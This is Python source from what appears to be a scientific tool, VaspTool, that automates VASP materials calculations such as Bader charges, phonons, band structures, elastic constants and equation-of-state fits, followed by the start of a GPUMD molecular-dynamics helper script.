super().__init__(job_type="bader", step_type="scf", folder="bader", **kwargs)
@cached_property
def incar(self):
incar = super().incar
incar["LAECHG"] = True
return incar
def save_summary(self, summary):
with open(self.run_dir.joinpath("ACF.dat"), "w", encoding="utf8") as f:
header = "Id,X,Y,Z,label,charge,transfer,min dist,atomic volume".split(",")
header = [i.center(10) for i in header]
header_text = "".join(header)
f.write(header_text)
f.write("\n")
f.write("-" * 100)
f.write("\n")
for index in range(len(self.structure)):
site = self.structure[index]
line = [index + 1, round(site.x, 4), round(site.y, 4), round(site.z, 4), site.label,
round(summary['charge'][index], 4),
round(summary['charge_transfer'][index], 4),
round(summary['min_dist'][index], 4),
round(summary['atomic_volume'][index], 4)]
line = [str(i).center(10) for i in line]
f.write("".join(line))
f.write("\n")
f.write("-" * 100)
f.write("\n")
f.write(f"vacuum charge : {summary['vacuum_charge']}\n")
f.write(f"vacuum volume : {summary['vacuum_volume']}\n")
f.write(f"bader version : {summary['bader_version']}\n")
def post_processing(self, result=None):
result = super().post_processing(result)
logging.info("\t开始bader电荷分析。")
summary = bader_analysis_from_path(self.run_dir.as_posix())
logging.info("\tbader电荷分析完成。")
self.save_summary(summary)
return result
@requires(Phonopy, "请先安装phonopy!")
class PhonopyJob():
pass
def __init__(self, structure: Structure, path: Path):
self.structure = structure
self.run_path = path.joinpath("pbe/phono")
verify_path(self.run_path)
self.ph_structure = phonopy.get_phonopy_structure(structure)
self.phonon = Phonopy(unitcell=self.ph_structure, supercell_matrix=config["KPOINTS"]["phono"]["super"])
self.phonon.generate_displacements(
distance=0.01,
)
self.disp_supercells = self.phonon.supercells_with_displacements
self.init_supercell = self.phonon.supercell
logging.info(f"一共生成{len(self.disp_supercells)}个结构")
displacements = self.phonon.displacements
# write_disp_yaml(
# displacements=displacements,
# supercell=self.init_supercell,
# filename=self.path.joinpath("phonopy_disp.yaml"),
# )
units = get_default_physical_units("vasp")
phpy_yaml = PhonopyYaml(
physical_units=units, settings={}
)
phpy_yaml.set_phonon_info(self.phonon)
with open(self.run_path.joinpath("phonopy_disp.yaml"), "w") as w:
w.write(str(phpy_yaml))
self.structure.to(self.run_path.joinpath("POSCAR").as_posix(), fmt="poscar")
phonopy.get_pmg_structure(self.init_supercell).to(self.run_path.joinpath("SPOSCAR"), fmt="poscar")
@property
def supercell_structures(self):
index = 1
for cell in self.disp_supercells:
if cell is not None:
s = phonopy.get_pmg_structure(cell)
s.to(self.run_path.joinpath(f"POSCAR-{index:03d}").as_posix(), fmt="poscar")
index += 1
yield s
def set_forces(self, forces):
self.phonon.forces = forces
write_FORCE_SETS(self.phonon.dataset, self.run_path.joinpath("FORCE_SETS"))
self.phonon.produce_force_constants(calculate_full_force_constants=False)
write_FORCE_CONSTANTS(self.phonon.force_constants, filename=self.run_path.joinpath("FORCE_CONSTANTS"),
p2s_map=self.phonon.primitive.p2s_map)
def get_bandstructure(self, plot=True):
kpoint = BaseKpoints().get_line_kpoints(None, function="pbe", structure=self.structure, job_type="phono",
step_type="band")
labels_dict = {a: k for a, k in zip(kpoint.labels, kpoint.kpts) if a != ""}
path = []
labels = []
for k, l in zip(kpoint.kpts, kpoint.labels):
# 去除重复路径
if path:
if path[-1] == list(k):
continue
else:
path.append(list(k))
else:
path.append(list(k))
if l.strip():
if labels:
if labels[-1] == l.strip():
continue
else:
labels.append(l.strip())
else:
labels.append(l.strip())
path = [path]
qpoints, connections = get_band_qpoints_and_path_connections(path, npoints=kpoint.num_kpts,
rec_lattice=self.structure.lattice.reciprocal_lattice.matrix)
self.phonon.run_band_structure(qpoints, path_connections=connections, labels=labels)
self.phonon.write_yaml_band_structure(None, filename=self.run_path.joinpath("band.yaml"))
# 这里还没搞明白 感觉是pymatgen的PhononBSPlotter画图问题 先放下
# qpoints = np.vstack(qpoints)
# print(qpoints.shape)
# self.phonon.run_qpoints(qpoints)
# frequencies = self.phonon.band_structure.frequencies
# frequencies = np.vstack(frequencies).T
# frequencies = self.phonon.qpoints.frequencies.T
# print(frequencies.shape)
# phono_bandstructure=PhononBandStructureSymmLine(qpoints, frequencies, self.structure.lattice, labels_dict=labels_dict)
if plot:
self.phonon.plot_band_structure().savefig(self.run_path.joinpath("phonon_bandstructure.png"), dpi=150)
# plotter = PhononBSPlotter(phono_bandstructure)
# plotter.save_plot(self.run_path.joinpath("phonon_bandstructure.png"))
# return phono_bandstructure
class VaspTool:
def __init__(self, cores: int = None,
mpirun_path: Path = "mpirun",
vasp_path: Path = "vasp_std",
force_coverage: bool = False,
kpoints_type="Gamma",
functions: list = ["pbe"],
dft_u=False,
disable_relaxation=False,
open_soc=False,
incar_args={}
):
"""
:param cores: 指定运行的核数,如不指定,就默认使用本机最大核数
:param mpirun_path: 如果没有设置环境变量,则需要设置下路径。
有环境变量默认即可
:param vasp_path: 如果没有设置vasp环境变量,则需要设置下路径。
有环境变量默认即可
:param force_coverage: 是否强制覆盖重复计算,
如果为False,计算前,如果存在4个输入文件以及OUTCAR,
他们文件内容一致,就不再进行计算。
如果为True,则不检查文件,直接计算。
:param functions:要使用的泛函方式 pbe hse
:param dft_u:是否开启加U
:param disable_relaxation:禁止优化
:param open_soc:使用vasp_ncl
"""
if cores is None:
cores = os.cpu_count()
else:
cores = cores
self.mpirun_path = mpirun_path
self.vasp_path = vasp_path
self.functions = functions
self.disable_relaxation = disable_relaxation
self.fermi = 0
# 这里是汇总下计算项添加的列
self.check_params()
self.job_args = {
"dft_u": dft_u,
"kpoints_type": kpoints_type,
"open_soc": open_soc,
"force_coverage": force_coverage,
"mpirun_path": self.mpirun_path,
"vasp_path": self.vasp_path,
"cores": cores
}
self.incar_args = incar_args
def check_params(self):
"""
做一些自检 包括泛函选择、vasp路径等
:return:
"""
if not all(item in FUNCTION_TYPE for item in args.function):
raise ValueError(f"function目前只支持{'、'.join(FUNCTION_TYPE)}")
if not (self.vasp_path.exists()):
vasp_std_path = get_command_path(self.vasp_path)
if vasp_std_path:
self.vasp_path = Path(vasp_std_path)
else:
raise ValueError(f"找不到文件:{self.vasp_path}")
if not (self.mpirun_path.exists()):
mpirun_path = get_command_path("mpirun")
if mpirun_path:
self.mpirun_path = Path(mpirun_path)
else:
raise ValueError(f"找不到文件:{self.mpirun_path}")
logging.info("计算泛函为:" + "、".join(self.functions))
logging.info(f"mpirun路径:{self.mpirun_path}")
logging.info(f"VASP路径:{self.vasp_path}" + "\t开启soc后会自动切换到同目录下的ncl版本")
def set_plot_setting(self, cbm: int, vbm: int, dpi: int):
self.vb_energy = vbm
self.cb_energy = cbm
self.dpi = dpi
self.job_args["vb_energy"] = vbm
self.job_args["cb_energy"] = cbm
self.job_args["dpi"] = dpi
def plot_bs_dos(self, bs_path: Path, dos_path: Path, file_path: Path):
"""
画出能带Dos组合图
:param bs_path: 这里必须是具体到计算能带的vasprun.xml的路径
:param dos_path: 这里必须是具体到计算dos的vasprun.xml的路径
:param file_name: 要保存的图片路径,这里是路径。比如./band.png
:return:
"""
if not (os.path.exists(bs_path) and os.path.exists(dos_path)):
logging.warning("必须计算完能带和dos后才能画能带dos图")
return
dos_vasprun = Vasprun(dos_path.as_posix(), parse_potcar_file=False)
bs_vasprun = BSVasprun(bs_path.as_posix(), parse_projected_eigen=True)
# 获取DOS数据
dos = dos_vasprun.complete_dos
bands = bs_vasprun.get_band_structure(line_mode=True)
plotter = BSDOSPlotter(bs_projection="elements", dos_projection="orbitals",
vb_energy_range=-self.vb_energy, cb_energy_range=self.cb_energy, fixed_cb_energy=True,
fig_size=(8, 6))
# 绘制DOS图
plot = plotter.get_plot(bands, dos)
plt.savefig(file_path, dpi=self.dpi)
def count_optic_dielectric_by_gw_bse(self, structure_info: pd.Series, path: Path):
band_job = BandStructureJob(structure=self.structure, path=path, function="gw", **self.job_args,
**self.incar_args)
band_job.run()
band_job.post_processing(structure_info)
optic_job = OpticJob(structure=self.structure, path=path, function="bse", **self.job_args, **self.incar_args)
cp_file(band_job.run_dir.joinpath("WAVE*"), optic_job.run_dir)
cp_file(band_job.run_dir.joinpath("*.tmp"), optic_job.run_dir)
optic_job.run(remove_wavecar=True)
optic_job.post_processing(structure_info)
return structure_info
def count_optic(self, structure_info: pd.Series, path: Path):
self.structure = structure_info["structure"]
# 进行结构优化
# return self.count_optic_dielectric_by_gw_bse(structure_info,path)
for function in self.functions:
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="optic_dielectric", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
# # # 进行scf自洽计算
scf_job = SCFJob(structure=self.structure, path=path,
job_type="optic_dielectric", function=function,
**self.job_args, **self.incar_args).run()
scf_job.post_processing(structure_info)
optic_job = OpticJob(structure=self.structure, path=path,
function=function, **self.job_args, **self.incar_args).run(remove_wavecar=True)
optic_job.post_processing(structure_info)
structure_info[structure_info.index != 'structure'].to_csv(
path.joinpath(f"{function}/result_{function}.csv"))
structure_info["structure"] = self.structure
return structure_info
def count_dielectric(self, structure_info: pd.Series, path: Path):
self.structure = structure_info["structure"]
# 进行结构优化
# return self.count_optic_dielectric_by_gw_bse(structure_info,path)
for function in self.functions:
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="optic_dielectric", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
# # # 进行scf自洽计算
scf_job = SCFJob(structure=self.structure, path=path,
job_type="optic_dielectric", function=function,
**self.job_args, **self.incar_args).run()
scf_job.post_processing(structure_info)
# #进行介电常数的
dielectric_job = StaticDielectricJob(structure=self.structure, path=path,
function=function, **self.job_args, **self.incar_args).run(
remove_wavecar=True)
dielectric_job.post_processing(structure_info)
structure_info[structure_info.index != 'structure'].to_csv(
path.joinpath(f"{function}/result_{function}.csv"))
structure_info["structure"] = self.structure
return structure_info
def calculate_band_by_gw(self, path, function):
band_job = BandStructureJob(structure=self.structure, path=path, function="gw", **self.job_args,
**self.incar_args)
band_job.run(remove_wavecar=True)
result = band_job.post_processing()
def count_band_structure(self, structure_info, path: Path = "./", channl="banddos") -> pd.Series:
self.structure: Structure = structure_info["structure"]
for function in self.functions:
# # # 进行scf自洽计算
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="band_structure", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
if function in ["gw"]:
self.calculate_band_by_gw(path, function=function)
scf_job = SCFJob(structure=self.structure, path=path,
job_type="band_structure", function=function,
**self.job_args, **self.incar_args).run()
scf_job.post_processing(structure_info)
if "dos" in channl:
dos_job = DosJob(structure=self.structure, path=path,
function=function, **self.job_args, **self.incar_args).run(remove_wavecar=True)
dos_job.post_processing(structure_info)
dos_vasprun = dos_job.run_dir.joinpath(f"vasprun.xml")
else:
dos_vasprun = path.joinpath(f"{function}/dos/vasprun.xm")
if "band" in channl:
band_job = BandStructureJob(structure=self.structure, path=path,
function=function, **self.job_args, **self.incar_args).run(
remove_wavecar=True)
band_job.post_processing(structure_info)
band_vasprun = band_job.run_dir.joinpath(f"vasprun.xml")
else:
band_vasprun = path.joinpath(f"{function}/band/vasprun.xml")
self.plot_bs_dos(band_vasprun, dos_vasprun,
path.joinpath(f"{function}/band_structure_dos_{function}.png"))
structure_info[structure_info.index != 'structure'].to_csv(
path.joinpath(f"{function}/result_{function}.csv"))
structure_info["structure"] = self.structure
return structure_info
def count_cohp(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure,
path=path,
job_type="band_structure",
function="pbe",
**self.job_args, **self.incar_args
).run()
self.structure = job.final_structure
count = 1
best_result = None
all_possible_basis = Lobsterin.get_all_possible_basis_functions(self.structure,
get_pot_symbols(self.structure.species))
logging.info(f"可能的基组个数:{len(all_possible_basis)}")
for basis_setting in all_possible_basis:
# # # 进行scf自洽计算
cohp_job = LobsterJob(
test=count,
structure=self.structure,
path=path,
job_type="cohp",
function="pbe",
**self.job_args, **self.incar_args
)
cohp_job.build_lobster(basis_setting)
cohp_job.run()
cohp_job.run_lobster()
result = cohp_job.post_processing()
result["basis"] = basis_setting
if best_result is None:
best_result = result
else:
if result["charge_spilling"] < best_result["charge_spilling"]:
best_result = result
count += 1
if best_result:
for k, v in best_result.items():
structure_info[k] = v
structure_info[structure_info.index != 'structure'].to_csv(path.joinpath(f"pbe/cohp/result.csv"))
return structure_info
def count_aimd(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="aimd", function="pbe",
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
aimd_job = AimdJob(
structure=self.structure, path=path,
job_type="aimd", function="pbe",
**self.job_args, **self.incar_args
)
aimd_job.run(remove_wavecar=True)
aimd_job.post_processing(
)
return structure_info
def count_elastic(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="elastic", function="pbe",
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
elastic_job = ElasticJob(
structure=self.structure, path=path,
function="pbe",
**self.job_args, **self.incar_args
)
elastic_job.run(remove_wavecar=True)
elastic_job.post_processing(structure_info
)
return structure_info
def count_phono(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
pass
self.incar_args["LREAL"] = False
self.incar_args["PREC"] = "Accurate"
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="phono", function="pbe",
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
phono_job = PhonopyJob(self.structure, path)
forces = []
for index, structure in enumerate(phono_job.supercell_structures):
scf_job = SCFJob(structure=structure, path=path,
job_type="phono", function="pbe", test=index + 1,
**self.job_args, **self.incar_args).run(remove_wavecar=True)
vasprun = Vasprun(scf_job.run_dir.joinpath("vasprun.xml"), parse_potcar_file=False)
forces.append(vasprun.ionic_steps[0]["forces"])
forces = np.array(forces)
phono_job.set_forces(forces)
result = phono_job.get_bandstructure(plot=True)
return structure_info
def count_scf(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
for function in self.functions:
# # # 进行scf自洽计算
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="single_point_energy", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
# 单点能暂时不考虑泛函了 如果后面考虑 需要考虑下波函数
scf_job = SCFJob(structure=self.structure, path=path, folder="single_point_energy",
job_type="single_point_energy", function=function,
**self.job_args, **self.incar_args).run(remove_wavecar=True)
scf_job.post_processing(structure_info)
return structure_info
def count_work_function(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
for function in self.functions:
# # # 进行scf自洽计算
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="work_function", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
# 这里考虑其他泛函的 比如hse 所以pbe的时候要输出一下自洽的波函数
if len(self.functions) != 1:
# 长度不等1 说明有其他泛函
if function != "pbe":
remove_wavecar = True
else:
remove_wavecar = False
else:
remove_wavecar = True
scf_job = WorkFunctionJob(structure=self.structure, path=path,
function=function,
**self.job_args, **self.incar_args).run(remove_wavecar=remove_wavecar)
scf_job.post_processing(structure_info)
return structure_info
def count_bader(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
for function in self.functions:
# # # 进行scf自洽计算
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="bader", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
scf_job = BaderJob(structure=self.structure, path=path,
function=function,
**self.job_args, **self.incar_args).run(remove_wavecar=True)
scf_job.post_processing(structure_info)
return structure_info
def count_eos(self, structure_info, path: Path = "./"):
self.structure: Structure = structure_info["structure"]
step = config["SETTING"].get("EOSStep")
step_num = config["SETTING"].get("EOSStepNum")
step_num += step_num % 2
for function in self.functions:
# # # 进行scf自洽计算
# self.structure.lattice.scale()
if not self.disable_relaxation:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="single_point_energy", function=function,
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
start = round(-step * step_num / 2, 4)
end = round(step * step_num / 2, 4)
lattice = self.structure.lattice
matrix = lattice.matrix.copy()
lattice_map = {
0: lattice.a,
1: lattice.b,
2: lattice.c
}
logging.info(f"搜索步长:{step} 搜索数量:{step_num}。晶格常数缩放范围:{start}-{end}")
values = np.linspace(start, end, step_num + 1, dtype=float)
values = np.around(values, 4)
results = []
for value in values:
structure = self.structure.copy()
if get_vacuum_axis(structure, 10) is None:
# 3维情况
for i, k in lattice_map.items():
matrix[i, :] = (matrix[i, :] / k) * (k + value)
else:
for i, k in lattice_map.items():
if i == get_vacuum_axis(structure, 10):
continue
matrix[i, :] = (matrix[i, :] / k) * (k + value)
structure.lattice = Lattice(matrix)
scf_job = SCFJob(structure=structure, path=path, folder=f"eos/cache/{value}",
job_type="single_point_energy", function=function,
**self.job_args, **self.incar_args).run(remove_wavecar=True)
result = scf_job.post_processing()
result["index"] = value
results.append(result)
results = pd.DataFrame(results)
eos = EOS(eos_name=config["SETTING"]["EOSModel"]).fit(results[f"volume_{function}"],
results[f"energy_{function}"])
eos.plot()
plt.tight_layout()
plt.savefig(path.joinpath(f"{function}/eos/eos.png"), dpi=self.job_args["dpi"])
results.to_csv(path.joinpath(f"{function}/eos/eos.csv"))
structure_info[f"e0_{function}"] = eos.e0
structure_info[f"b0_{function}"] = eos.b0
structure_info[f"b1_{function}"] = eos.b1
structure_info[f"v0_{function}"] = eos.v0
return structure_info
def cb_sr(self, structure_info, path):
self.structure: Structure = structure_info["structure"]
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="band_structure", function="pbe",
**self.job_args, **self.incar_args).run()
self.structure = job.final_structure
return structure_info
def test(self, structure_info, path):
"""
k点测试demo
通过传入KPOINTS给Job 自定义k点文件
传入全大写的字段会默认给incar 比如SIGMA=5
:param structure_info:
:param path:
:return:
"""
self.structure: Structure = structure_info["structure"]
result = []
kps = [3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
for i in kps:
job = StructureRelaxationJob(structure=self.structure, path=path,
job_type="band_structure", function="pbe", test=i,
KPOINTS=Kpoints.gamma_automatic((i, i, i)), SIGMA=5,
**self.job_args, **self.incar_args).run()
final_energy = Outcar(job.run_dir.joinpath("OUTCAR")).final_fr_energy
result.append(final_energy)
plt.plot(kps, result)
plt.savefig(job.run_dir.joinpath("test_kpoints.png"), dpi=self.dpi)
return structure_info
def count_main(self, file_path: Path, calculate_type="band"):
structure_dataframe = read_dataframe_from_file(file_path)
if structure_dataframe.empty:
logging.error("计算为空,请检查输入文件")
return
logging.info(f"一共读取到{structure_dataframe.shape[0]}个文件")
structure_dataframe: pd.DataFrame
callback_function = {
"band": partial(self.count_band_structure, channl="band"),
"banddos": partial(self.count_band_structure, channl="banddos"),
"dos": partial(self.count_band_structure, channl="dos"),
# "band": self.count_band_structure,
"optic": self.count_optic,
"dielectric": self.count_dielectric,
"elastic": self.count_elastic,
"sr": self.cb_sr,
"cohp": self.count_cohp,
"test": self.test,
"aimd": self.count_aimd,
"aimd-ml": self.count_aimd,
"phono": self.count_phono,
"scf": self.count_scf,
"work_function": self.count_work_function,
"eos": self.count_eos,
"bader": self.count_bader,
}
for index, struct_info in structure_dataframe.iterrows():
try:
if struct_info.get("calculate"):
continue
path = Path(f"./cache/{struct_info['system']}{GlobSuffix}")
if calculate_type in callback_function.keys():
struct_info = callback_function[calculate_type](struct_info, path)
except KeyboardInterrupt:
return
except Exception:
# 计算出错
logging.error(traceback.format_exc())
with open("./err.txt", "a+", encoding="utf8") as f:
f.write(struct_info['system'] + "\n")
store_dataframe_as_json(struct_info.to_frame(), path.joinpath("result.json"))
struct_info[struct_info.index != 'structure'].to_csv(path.joinpath("result.csv"))
struct_info["calculate"] = True
for i in struct_info.index:
if i not in structure_dataframe.columns:
structure_dataframe.loc[:, i] = None
structure_dataframe.loc[index] = struct_info
if file_path.suffix == ".json":
store_dataframe_as_json(structure_dataframe, file_path.name)
else:
store_dataframe_as_json(structure_dataframe, f"./result/all_result{GlobSuffix}.json")
structure_dataframe.loc[:, structure_dataframe.columns != 'structure'].to_csv(
f"./result/result{GlobSuffix}.csv")
# break
logging.info("全部计算完成")
def build_argparse():
parser = argparse.ArgumentParser(description="""Vasp计算脚本.
如果只计算pbe的带隙:python VaspTool.py band POSCAR
如果计算hse能带:python VaspTool.py band POSCAR --function pbe hse
计算杂化泛函以pbe为基础,所以hse前要加上pbe,泛函是按顺序执行的.""", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
"calculate_type", choices=calculate_type, help=f"要计算的类型,可以自己封装下,目前有:{'、'.join(calculate_type)}"
)
parser.add_argument(
"path", type=Path, help="要计算的POSCAR路径,或者要批量计算的文件夹。"
)
parser.add_argument(
"incar_args", type=str, help="对于INCAR的补充,将使用INCAR标准字段,可以设置多个空格隔开。例如 NSW=100 ENCUT=600",
nargs="*"
)
parser.add_argument(
"-v", "--version", action="version", version=__version__
)
group_vasp = parser.add_argument_group('计算细节', '设置K点类型、泛函等。')
group_vasp.add_argument(
"-k", "--kpoints_type", type=str, help="KPOINTS取点方式:Gamma、Monkhorst。可以只写首字母",
default=setting.get("kpoints_type", "G")
)
group_vasp.add_argument(
"--function", type=str, help="要使用的泛函方法比如pbe、hse", default=["pbe"], nargs="*"
)
group_vasp.add_argument(
"-u", action='store_true', help="是否加U", default=False
)
group_vasp.add_argument(
"-soc", "--open_soc", action='store_true', help="是否打开soc", default=False
)
group_vasp.add_argument(
"--vdw", choices=list(config.get("VDW", {}).keys()), help="设置vdW 泛函", default=None
)
group_vasp.add_argument(
"--disable_sr", action='store_true', help="是否禁止优化", default=False
)
group_run = parser.add_argument_group('任务相关', '设置计算核数、vasp、mpirun环境等。')
group_run.add_argument(
"-s", "--suffix", type=str, help="给文件夹名字以及输出文件添加一个后缀", default=setting.get("suffix", "")
)
group_run.add_argument(
"-f", "--force_coverage", action='store_true', help="是否强制覆盖运行", default=False
)
group_run.add_argument(
"-n", "-c", "--core", type=int, help="要计算使用的核数,默认为计算机最大核数。。", default=os.cpu_count()
)
group_run.add_argument(
"--vasp_path", type=Path, help="vasp_std计算路径,如果设置环境变量,可以不传这个参数",
default=setting.get("vasp_path", "G")
)
group_run.add_argument(
"--mpirun_path", type=Path, help="mpirun 路径,如果设置环境变量,可以不传这个参数",
default=setting.get("mpirun_path", "G")
)
group_plot = parser.add_argument_group('画图', '画图细节设置。')
group_plot.add_argument(
"--energy_min", type=int, help="画能带图的时候y轴的下限", default=setting.get("energy_min", "G")
)
group_plot.add_argument(
"--energy_max", type=int, help="画能带图的时候y轴的上限", default=setting.get("energy_max", "G")
)
group_plot.add_argument(
"--dpi", type=int, help="保存图的清晰度", default=setting.get("dpi", "G")
)
return parser
def parse_input_incar_value(input_values: list | None):
result = {}
if not input_values:
return result
for input_value in input_values:
values = input_value.split("=")
if len(values) != 2:
logging.warning("输入的INCAR参数必须用等号连接,不同参数间用空格,比如:NSW=50。而不是:" + input_value)
continue
key, value = values
try:
v = Incar.proc_val(key, value)
except:
logging.warning("输入的INCAR参数必须用等号连接,不同参数间用空格,比如:NSW=50。而不是:" + input_value)
continue
result[key] = v
logging.info(f"通过脚本传入的INCAR参数为:{result}")
return result
if __name__ == '__main__':
calculate_type = ["band", "dos", "banddos", "optic", "cohp",
"dielectric", "aimd", "aimd-ml", "phono", "elastic",
"scf", "work_function", "eos",
"bader"
]
parser = build_argparse()
args = parser.parse_args()
logging.info(f"任务使用核数:{args.core}")
if not os.path.exists("./result"):
os.mkdir("./result")
incar_args = parse_input_incar_value(args.incar_args)
if args.calculate_type == "aimd-ml":
incar_args["ML_LMLFF"] = True
incar_args["ML_MODE"] = "train"
if args.vdw:
vdw = config["VDW"][args.vdw]
for k, v in vdw.items():
incar_args[k] = v
logging.info(f"设置VDW泛函{args.vdw}参数:{vdw}")
vasp = VaspTool(vasp_path=args.vasp_path,
mpirun_path=args.mpirun_path,
force_coverage=args.force_coverage,
kpoints_type=args.kpoints_type,
cores=args.core,
functions=args.function,
dft_u=args.u,
disable_relaxation=args.disable_sr,
open_soc=args.open_soc,
incar_args=incar_args
)
if args.suffix:
# 多节点在同一路径计算 给每个job设置一个后缀 这样可以避免数据在同一个路径下计算造成数据覆盖
GlobSuffix = f"-{args.suffix}"
else:
GlobSuffix = ""
vasp.set_plot_setting(vbm=args.energy_min, cbm=args.energy_max, dpi=args.dpi)
vasp.count_main(args.path, args.calculate_type)
| 102,596 | Python | .py | 2,183 | 33.347229 | 150 | 0.559233 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,157 | GpumdTool.py | aboys-cb_VaspTool/gpumd/GpumdTool.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/7/2 11:17
# @Author : 兵
# @email : [email protected]
import matplotlib
import numpy as np
from scipy.spatial.distance import cdist
matplotlib.use("Agg")
import argparse
import datetime
import glob
import logging
import os
import sys
import shutil
import subprocess
from pathlib import Path
from calorine.gpumd import *
from calorine.nep import get_descriptors
from ase.io import read as ase_read
from ase.io import write as ase_write
import matplotlib.pyplot as plt
from monty.os import cd
from sklearn.decomposition import PCA
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
stream=sys.stdout # 指定输出流为sys.stdout
)
# 这里是间距 每隔NumSamples 抽取一个
# 因为我是每1000步输出一个 跑1ns 一共也就100个数据 所以我设置2 抽取50
NumSamples = 2
# 从pynep复制的最远点采样 就使用这一个函数 因为安装不方便
def select(new_data, now_data=[], min_distance=None, min_select=1, max_select=None):
"""Select those data fartheset from given data
Args:
new_data (2d list or array): A series of points to be selected
now_data (2d list or array): Points already in the dataset.
Defaults to []. (No existed data)
min_distance (float, optional):
If distance between two points exceeded the minimum distance, stop the selection.
Defaults to None (use the self.min_distance)
min_select (int, optional): Minimal numbers of points to be selected. This may cause
some distance between points less than given min_distance.
Defaults to 1.
max_select (int, optional): Maximum numbers of points to be selected.
Defaults to None. (No limitation)
Returns:
A list of int: index of selected points
"""
metric = 'euclidean'
metric_para = {}
min_distance = min_distance
max_select = max_select or len(new_data)
to_add = []
if len(new_data) == 0:
return to_add
if len(now_data) == 0:
to_add.append(0)
now_data.append(new_data[0])
distances = np.min(cdist(new_data, now_data, metric=metric, **metric_para), axis=1)
while np.max(distances) > min_distance or len(to_add) < min_select:
i = np.argmax(distances)
to_add.append(i)
if len(to_add) >= max_select:
break
distances = np.minimum(distances, cdist([new_data[i]], new_data, metric=metric)[0])
return to_add
def run(run_cmd: str, run_dir: Path):
start = datetime.datetime.now()
logging.info("\t开始计算")
vasp_cmd = [os.path.expanduser(os.path.expandvars(run_cmd))]
with cd(run_dir), open(f"gpumd.out", "w") as f_std, open(f"gpumd.err", "w", buffering=1) as f_err:
subprocess.check_call(vasp_cmd, stdout=f_std, stderr=f_err)
logging.info("\t计算完成" + f"\t耗时:{datetime.datetime.now() - start}")
def remove_garbage_structure(atoms_list):
# 删除跑崩溃的结构
result = []
for atoms in atoms_list:
postion = atoms.get_all_distances()
if (np.min(postion[postion > 0])) < 0.8:
continue
result.append(atoms)
return result
def verify_path(path: Path) -> None:
"""
会检查是否存在路径,若不存在,则创建该路径,支持多级目录创建
:param path:
:return:
"""
if not path.exists():
# path.mkdir()
os.makedirs(path)
def cp_file(source_file: Path, destination_dir: Path) -> None:
"""
复制文件
:param source_file: 要复制的文件
:param destination_dir: 希望复制到的路径
:return:
"""
src_files = glob.glob(source_file.as_posix())
for i in src_files:
logging.debug(f"\t复制文件:{i} -> {destination_dir.as_posix()}")
shutil.copy(i, destination_dir.as_posix())
return
def iter_path(glob_strs: list):
def decorator(func):
def wrapper(path: Path | str, *args, **kwargs):
if isinstance(path, str):
path = Path(path)
if path.is_dir():
parent = path
else:
parent = path.parent
result =[]
for glob_str in glob_strs:
for i in parent.glob(glob_str):
if path.is_file():
if i.name != path.name:
continue
try:
result.append(func(i, *args, **kwargs))
except KeyboardInterrupt:
return
except Exception as e:
logging.error(e)
pass
return result
return wrapper
return decorator
@iter_path(["*.xyz", "*.vasp"])
def molecular_dynamics(path: Path, temperature, run_time, template):
"""
根据指定的文件夹 以此计算文件夹下的所有的xyz文件
:param self:
:return:
"""
if path.suffix == ".vasp":
atoms = ase_read(path, 0, format="vasp", do_not_split_by_at_sign=True)
else:
atoms = ase_read(path, 0, format="extxyz", do_not_split_by_at_sign=True)
md_path = root_path.joinpath(f"cache/{atoms.symbols}{GlobSuffix}/{run_time}/md@{template}-{temperature}k")
shutil.rmtree(md_path, ignore_errors=True)
verify_path(md_path)
logging.info(f"路径:{md_path.as_posix()}")
new_run_in = []
run_in = read_runfile(f"./{template}")
for step in run_in:
if step[0] == "velocity":
new = ("velocity", temperature)
elif step[0] == "ensemble":
ensemble = list(step[1])
ensemble[1] = temperature
ensemble[2] = temperature
new = ("ensemble", ensemble)
elif step[0] == "run":
new = ('run', 1000 * run_time)
else:
new = step
new_run_in.append(new)
write_runfile(md_path.joinpath("run.in"), new_run_in)
cp_file(root_path.joinpath("nep.txt"), md_path.joinpath("nep.txt"))
atoms.write(md_path.joinpath("model.xyz"), format="extxyz")
run("gpumd", md_path)
data = read_thermo(md_path.joinpath("thermo.out").as_posix(), len(atoms))
potential_energy = data.potential_energy.to_numpy(dtype='float')
fig = plt.figure()
plt.plot(list(range(potential_energy.shape[0])), potential_energy)
plt.savefig(md_path.joinpath("md_energy.png"), dpi=150)
